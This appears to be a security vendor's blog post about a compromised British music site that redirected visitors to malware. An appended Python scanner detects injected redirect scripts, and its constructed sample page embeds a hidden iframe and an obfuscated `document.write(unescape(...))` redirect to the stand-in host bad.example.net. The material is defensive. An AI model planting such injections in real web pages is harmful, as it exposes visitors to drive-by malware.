Compromised websites are a sad fact of life on the Internet today, and here’s proof. Last week the website of a major British music producer was compromised, and stayed that way for at least several days. The site is now clean (last checked July 31, 2009) but the lessons to be learned from it remain relevant.
The site was compromised with an injected script that redirected visitors' browsers to a domain identified by Trend Micro researchers as a known malware distribution point, as shown in the NoScript window captured by Senior Security Analyst Rik Ferguson.
The compromised pages themselves were detected as HTML_YBLOD.A, but the payloads dropped onto affected systems varied, and included the following malware: BKDR_RUSTOCK.GM, BKDR_RUSTOCK.ER, TROJ_PATCHED.P, TROJ_PATCHER.AM, and TROJ_TEDROO.E. Any one of these would have been enough to cause users problems; that this much malware arrived through a single vector illustrates how serious a threat a compromised website is, both for its visitors and for its owner.
Ultimately, the burden falls primarily on webmasters to properly secure their websites: best practices such as keeping software packages updated and using strong passwords are a must today. Users must also take care when browsing, because being on a known legitimate site is no guarantee of safety.
Trend Micro Smart Protection Network protects users from similar attacks by detecting the website harboring the script as HTML_YBLOD.A (as long as the injected script is still present in the page source) and by blocking access to the malicious URLs it redirects to.
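To make the detection idea concrete, the following is an added example and not Trend Micro's detection logic, nor the actual script found on the compromised site: a small Python scanner that reads saved page source and flags the usual signs of an injected redirector, namely off-site `<script src>` references, hidden or off-site iframes, and inline scripts that use `document.write(unescape(...))` or long escape runs. The sample page, the site hostname `example-music.co.uk` and the attacker domain `bad.example.net` are all constructed for illustration.

```python
"""Scan saved HTML for injected redirect scripts and hidden iframes.

Added example; not Trend Micro's detector and not the script from the
compromised site. All hostnames and the sample page are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-script patterns that commonly mark injected redirectors:
# document.write() of an unescape()d string, or long %xx / \xNN escape runs.
OBFUSCATION_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\("
    r"|(?:%[0-9a-fA-F]{2}){8,}"
    r"|(?:\\x[0-9a-fA-F]{2}){8,}"
)
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class InjectionScanner(HTMLParser):
    """Collects (line, kind, host) findings while parsing a page."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_script = False
        self._script_line = 0

    def _offsite(self, url):
        """Return the hostname if it is not the site or one of its subdomains."""
        host = urlparse(url).hostname
        if not host:            # relative URL: resolves to the site itself
            return None
        host = host.lower()
        if host == self.site_host or host.endswith("." + self.site_host):
            return None
        return host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)          # HTMLParser already strips attribute quotes
        line, _ = self.getpos()
        if tag == "script":
            self._in_script = True
            self._script_line = line
            host = self._offsite(a.get("src") or "")
            if host:
                self.findings.append((line, "external script", host))
        elif tag == "iframe":
            host = self._offsite(a.get("src") or "")
            hidden = (
                (a.get("width") or "").strip() in ("0", "1")
                or (a.get("height") or "").strip() in ("0", "1")
                or HIDDEN_STYLE_RE.search(a.get("style") or "") is not None
            )
            if host and hidden:
                self.findings.append((line, "hidden off-site iframe", host))
            elif host:
                self.findings.append((line, "off-site iframe", host))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies over as raw data (CDATA mode).
        if self._in_script and OBFUSCATION_RE.search(data):
            self.findings.append((self._script_line, "obfuscated inline script", "-"))


def scan_page(html, site_host):
    """Return a list of (line, kind, host) findings for one page."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a legitimate page with two injected elements appended.
SAMPLE_PAGE = """<html><head><title>Releases</title>
<script src="/js/site.js"></script>
<script src="http://cdn.example-music.co.uk/player.js"></script>
</head><body>
<h1>New releases</h1>
<iframe src="http://bad.example.net/in.php" width="0" height="0" frameborder="0"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fbad.example.net%2Fa%22%3E'));</script>
</body></html>"""


if __name__ == "__main__":
    for line, kind, host in scan_page(SAMPLE_PAGE, "example-music.co.uk"):
        print(f"line {line}: {kind} ({host})")
```

The local `/js/site.js` and the site's own CDN subdomain are deliberately ignored, while the zero-size iframe and the `document.write(unescape(...))` block are reported. This is a heuristic, not a signature: an attacker can move the redirect into an external script the page already trusts, which is why URL blocking at the network layer complements scanning the page source.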